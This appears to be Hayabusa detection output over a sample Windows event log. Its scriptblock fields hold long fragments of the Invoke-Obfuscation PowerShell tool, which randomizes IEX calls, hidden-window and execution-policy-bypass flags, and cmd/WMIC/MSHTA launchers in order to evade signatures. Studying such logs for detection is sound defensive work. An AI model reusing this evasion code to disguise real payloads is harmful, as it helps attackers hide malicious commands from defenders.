(Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will iterate through each element of the array. $BaseScriptArray1 = ""`$$RandomScriptVar[0..(`$$RandomScriptVar.$Length-1)]"" # Generate random JOIN syntax for all above options. $NewScriptArray1 = @() $NewScriptArray1 += $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray1 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript1 = (Get-Random -Input $NewScriptArray1) # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray2 = @() $BaseScriptArray2 += '(' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DigitDelimiterChar + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 += ""`[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int[]]"" + ' '*(Get-Random -Input @(0,1)) + ""("" + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 = (Get-Random -Input $BaseScriptArray2) # Generate random JOIN syntax for all above options. $NewScriptArray2 = @() $NewScriptArray2 += $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray2 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + $BaseScriptArray2 + ')' $NewScriptArray2 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + ')' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray2) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Insert)"" , ""''.Insert.ToString()"")) + '[' + (Get-Random -Input @(3,7,14,23,33)) + ',' + (Get-Random -Input @(10,26,41)) + "",27]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Normalize)"" , ""''.Normalize.ToString()"")) + '[' + (Get-Random -Input @(3,13,23,33,55,59,77)) + ',' + (Get-Random -Input @(15,35,41,45)) + "",46]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Chars)"" , ""''.Chars.ToString()"")) + '[' + (Get-Random -Input @(11,15)) + ',' + (Get-Random -Input @(18,24)) + "",19]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.SubString)"" , ""''.SubString.ToString()"")) + '[' + (Get-Random -Input @(3,13,17,26,37,47,51,60,67)) + ',' + (Get-Random -Input @(29,63,72)) + ',' + (Get-Random -Input @(30,64)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Remove)"" , ""''.Remove.ToString()"")) + '[' + (Get-Random -Input @(3,14,23,30,45,56,65)) + ',' + (Get-Random -Input @(8,12,26,50,54,68)) + ',' + (Get-Random -Input @(27,69)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOfAny)"" , ""''.LastIndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,8,34,42,67,76,84,92,117,126,133)) + ',' + (Get-Random -Input @(11,45,79,95,129)) + ',' + (Get-Random -Input @(12,46,80,96,130)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOf)"" , ""''.LastIndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,8,29,37,57,66,74,82,102,111,118,130,138,149,161,169,180,191,200,208,216,227,238,247,254,266,274,285,306,315,326,337,345,356,367,376,393,402,413,424,432,443,454,463,470,491,500,511)) + ',' + (Get-Random -Input @(11,25,40,54,69,85,99,114,141,157,172,188,203,219,235,250,277,293,300,333,348,364,379,387,420,435,451,466,485,518)) + ',' + (Get-Random -Input @(12,41,70,86,115,142,173,204,220,251,278,349,380,436,467)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IsNormalized)"" , ""''.IsNormalized.ToString()"")) + '[' + (Get-Random -Input @(5,13,26,34,57,61,75,79)) + ',' + (Get-Random -Input @(15,36,43,47)) + "",48]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOfAny)"" , ""''.IndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,4,30,34,59,68,76,80,105,114,121)) + ',' + (Get-Random -Input @(7,37,71,83,117)) + ',' + (Get-Random -Input @(8,38,72,84,118)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOf)"" , ""''.IndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,4,25,29,49,58,66,70,90,99,106,118,122,133,145,149,160,171,180,188,192,203,214,223,230,242,246,257,278,287,298,309,313,324,335,344,361,370,381,392,396,407,418,427,434,455,464,475)) + ',' + (Get-Random -Input @(7,21,32,46,61,73,87,102,125,141,152,168,183,195,211,226,249,265,272,305,316,332,347,355,388,399,415,430,449,482)) + ',' + (Get-Random -Input @(8,33,62,74,103,126,153,184,196,227,250,317,348,400,431)) + ""]-Join''"" + "")"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Randomly choose from above invoke operation syntaxes. $NewScript = (Get-Random -Input $InvokeOptions) # Reassemble all components of the final command. $NewScript = $ScriptStringPart1 + $NewScript + '}' # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(G",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.285 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"et-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.285 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"et-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.285 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-PowerShellLauncher { <# .SYNOPSIS Applies launch syntax to PowerShell command so it can be run from cmd.exe and have its command line arguments further obfuscated via launch obfuscation techniques. Invoke-Obfuscation Function: Out-PowerShellLauncher Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (used for WMIC launcher -- located in Out-ObfuscatedStringCommand.ps1), Out-ConcatenatedString (used for WMIC and MSHTA launchers -- located in Out-ObfuscatedTokenCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-PowerShellLauncher obfuscates a given PowerShell command (via stdin, process-level environment variables, clipboard, etc.) while wrapping it in syntax to be launched directly from cmd.exe. Some techniques also push command line arguments to powershell.exe's parent (denoted with +) or even grandparent (denoted with ++) process command line arguments. 1 --> PS 2 --> CMD 3 --> WMIC 4 --> RUNDLL 5 --> VAR+ 6 --> STDIN+ 7 --> CLIP+ 8 --> VAR++ 9 --> STDIN++ 10 --> CLIP++ 11 --> RUNDLL++ 12 --> MSHTA++ .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER LaunchType Specifies the launch syntax to apply to ScriptBlock. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER SwitchesAsString (Optional) Specifies above PowerShell execution flags per a single string. .EXAMPLE C:\PS> Out-PowerShellLauncher -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive 3 C:\windows\SYstEM32\cmd.EXe /C ""sET oPUWV=Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green&& POWErshELl -NOnINt -noPrOfil ${eX`eCUti`on`cO`NTeXT}.\""INVO`k`e`coMMANd\"".\""INvo`KeS`C`RIPt\""( ( GET-CHI`Ldit`EM EnV:OPuwV ).\""v`AlUE\"" )"" .NOTES This cmdlet is an ideal last step after applying other obfuscation cmdlets to your script block or file path contents. Its more advanced obfuscation options are included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent or grandparent process' command line arguments. There are additional techniques to split the command contents cross multiple commands and have the final PowerShell command re-assemble in memory and execute that are not currently included in this version. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [ValidateSet(1,2,3,4,5,6,7,8,9,10,11,12)] [Int] $LaunchType, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Parameter(Position = 2)] [String] $SwitchesAsString ) # To capture and output args in a process tree format for the applied launcher syntax. $ArgsDefenderWillSee = @() # Convert ScriptBlock to a String. $ScriptString = [String]$ScriptBlock # Check and throw warning message if input $ScriptString contains new line characters. If($ScriptString.Contains([Char]13+[Char]10)) { Write-Host """" Write-Warning ""Current script content contains newline characters.`n Applying a launcher will not work on the command line.`n Apply ENCODING obfuscation before applying LAUNCHER."" Start-Sleep 1 Return $ScriptString } # $SwitchesAsString argument for passing in flags from user input in Invoke-Obfuscation. If($SwitchesAsString.Length -gt 0) { If(!($SwitchesAsString.Contains('0'))) { $SwitchesAsString = ([Char[]]$SwitchesAsString | Sort-Object -Unique -Descending) -Join ' ' ForEach($SwitchAsString in $SwitchesAsString.Split(' ')) { Switch($SwitchAsString) { '1' {$NoExit = $TRUE} '2' {$NonInteractive = $TRUE} '3' {$NoLogo = $TRUE} '4' {$NoProfile = $TRUE} '5' {$Command = $TRUE} '6' {$WindowsStyle = 'Hidden'} '7' {$ExecutionPolicy = 'Bypass'} '8' {$Wow64 = $TRUE} default {Write-Error ""An invalid `$SwitchAsString value ($SwitchAsString) was passed to switch block for Out-PowerShellLauncher""; Exit;} } } } } # Parse out and escape key characters in particular token types for powershell.exe (in reverse to make indexes simpler for escaping tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $CharsToEscape = @('&','|','<','>') For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Manually extract token since tokenization will remove certain characters and whitespace which we want to retain. $PreTokenStr = $ScriptString.SubString(0,$Token.Start) $ExtractedToken = $ScriptString.SubString($Token.Start,$Token.Length) $PostTokenStr = $ScriptString.SubString($Token.Start+$Token.Length) # Escape certain characters that will be problematic on the command line for powershell.exe (\) and cmd.exe (^). # Single cmd escaping (^) for strings encapsulated by double quotes. For all other tokens apply double layer escaping (^^^). If($Token.Type -eq 'String' -AND !($ExtractedToken.StartsWith(""'"") -AND $ExtractedToken.EndsWith(""'""))) { ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^$Char"")} } If($ExtractedToken.Contains('\')) {$ExtractedToken = $ExtractedToken.Replace('\','\\')} If($ExtractedToken.Contains('""')) {$ExtractedToken = '\""' + $ExtractedToken.SubString(1,$ExtractedToken.Length-1-1) + '\""'} } Else { # Before adding layered escaping for special characters for cmd.exe, preserve escaping of ^ used NOT as an escape character (like as part of an Empire key). If($ExtractedToken.Contains('^')) { $ExtractedTokenSplit = $ExtractedToken.Split('^') $ExtractedToken = '' For($j=0; $j -lt $ExtractedTokenSplit.Count; $j++) { $ExtractedToken += $ExtractedTokenSplit[$j] $FirstCharFollowingCaret = $ExtractedTokenSplit[$j+1] If(!$FirstCharFollowingCaret -OR ($CharsToEscape -NotContains $FirstCharFollowingCaret.SubString(0,1)) -AND ($j -ne $ExtractedTokenSplit.Count-1)) { $ExtractedToken += '^^^^' } } } ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^^^$Char"")} } } # Add $ExtractedToken back into context in $ScriptString $ScriptString = $PreTokenStr + $ExtractedToken + $PostTokenStr } # Randomly select PowerShell execution flag argument substrings and randomize the order for all flags passed to this function. # This is to prevent the Blue Team from placing false hope in simple signatures for the shortest form of these arguments or consistent ordering. $PowerShellFlags = New-Object String[](0) If($PSBoundParameters['NoExit'] -OR $NoExit) { $FullArgument = ""-NoExit"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile'] -OR $NoProfile) { $FullArgument = ""-NoProfile"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive'] -OR $NonInteractive) { $FullArgument = ""-NonInteractive"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo'] -OR $NoLogo) { $FullArgument = ""-NoLogo"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to overwrite the WindowStyle value with the corresponding integer representation of the predefined parameter value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } 